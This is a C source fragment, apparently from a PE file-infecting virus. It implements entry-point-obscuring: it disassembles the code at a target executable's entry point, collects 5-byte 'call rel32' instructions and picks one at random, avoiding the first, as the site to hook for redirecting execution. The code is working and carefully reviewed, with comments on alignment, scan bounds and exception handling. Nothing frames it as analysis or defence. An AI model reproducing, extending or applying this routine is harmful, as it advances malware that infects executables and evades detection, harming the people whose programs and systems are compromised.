/*
 * One candidate `call rel32` site found near the entry point, used as an
 * EPO (entry-point-obscuring) hook location.
 */
typedef struct EPO_Info
{
	U32 raw_;   /* address of the E8 opcode inside the mapped file buffer, truncated to U32 */
	U32 from;   /* virtual address of the call instruction (image_base + RVA) */
	U32 to;     /* virtual address the call targets (from + rel32 + 5) */
} EPO_Info;
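/* Assemble the little-endian 32-bit rel32 operand byte-by-byte instead of
 * dereferencing a (possibly misaligned) U32* into the file buffer, which is
 * undefined behaviour under strict aliasing/alignment rules. PE x86 code is
 * little-endian, so the result equals the old `*(U32*)p` on the target. */
static U32 epo_read_le32(const U8 *p)
{
	return (U32)p[0] | ((U32)p[1] << 8) | ((U32)p[2] << 16) | ((U32)p[3] << 24);
}

/*
 * Scan the code at the entry point for `call rel32` (E8 xx xx xx xx)
 * instructions and pick one as the EPO hook site.
 *
 * file_buf   - start of the mapped file image; raw file offsets apply to it.
 * image_base - load address used to turn RVAs into virtual addresses.
 * raw_entry  - raw file offset of the entry point code.
 * entry      - RVA of the entry point.
 * code_size  - number of bytes of code to scan, starting at raw_entry.
 * epo_info   - receives the chosen call (see EPO_Info).
 *
 * Returns 1 and fills *epo_info when at least one call was found, 0 when the
 * scan found none, stopped on an undecodable instruction, or faulted.
 *
 * Up to MAX_EPO_CALL candidates are collected in encounter order. When more
 * than one was found, the first is never chosen (so that the first call after
 * the entry point is left untouched where possible) and one of the remaining
 * candidates is selected at random.
 *
 * NOTE(review): Disasm() is given code_text without its size; the 1000-byte
 * buffer is assumed to be large enough for any single decoded instruction.
 * NOTE(review): the only bound on what Disasm() may read is code_size plus the
 * SEH handler; a length for file_buf is not part of this interface, so a
 * truncated image that is still mapped readable is not detected here.
 */
U32 SearchForEntry(U8* file_buf, U32 image_base, U32 raw_entry, U32 entry, int code_size, EPO_Info* epo_info)
{
	EPO_Info valid_call[MAX_EPO_CALL] = { { 0 } };
	U32 _eip = entry + image_base;
	int total_instr_len = 0, cur_instr_len, i = 0;
	char code_text[1000] = { 0 };

	/* Any access violation while walking the (untrusted) code is turned into
	 * a plain failure rather than a crash. */
	__try {
		file_buf += raw_entry;
		while (total_instr_len < code_size) {
			cur_instr_len = Disasm(file_buf, code_text);
			if (cur_instr_len <= 0) {
				break;
			}
			/* Do not accept an instruction that straddles the end of the scan
			 * window: its rel32 operand (and the advance below) would lie
			 * outside the code_size bytes the caller asked us to look at.
			 * Disasm() has already peeked at those bytes by this point; this
			 * only stops us from recording or stepping past them. */
			if (cur_instr_len > code_size - total_instr_len) {
				break;
			}
			if (file_buf[0] == 0xE8 && cur_instr_len == 5) {
				/* (U32)file_buf truncates the pointer on 64-bit builds; the
				 * struct field is U32, so this is kept as-is for compatibility. */
				valid_call[i].raw_ = (U32)file_buf;
				valid_call[i].from = _eip;
				/* rel32 is signed, but U32 wraparound yields the same target. */
				valid_call[i].to = _eip + epo_read_le32(file_buf + 1) + 5;
				/* Stop once we have enough candidates. */
				if (++i >= MAX_EPO_CALL) {
					break;
				}
			}
			file_buf += cur_instr_len;
			total_instr_len += cur_instr_len;
			_eip += (U32)cur_instr_len;
		}
	} __except (1) {
		return 0;
	}

	if (i == 0) {
		return 0;
	}

	/* rand() is only used to vary which candidate is hooked; it is not a
	 * secret and needs no cryptographic quality. Note this reseeds the
	 * process-wide C RNG as a side effect. */
	srand(GetTickCount());
	/* Do not modify the first call if possible: with a single candidate take
	 * it, otherwise pick uniformly from candidates 1..i-1. */
	i = (i == 1) ? 0 : (1 + rand() % (i - 1));
	*epo_info = valid_call[i];
	return 1;
}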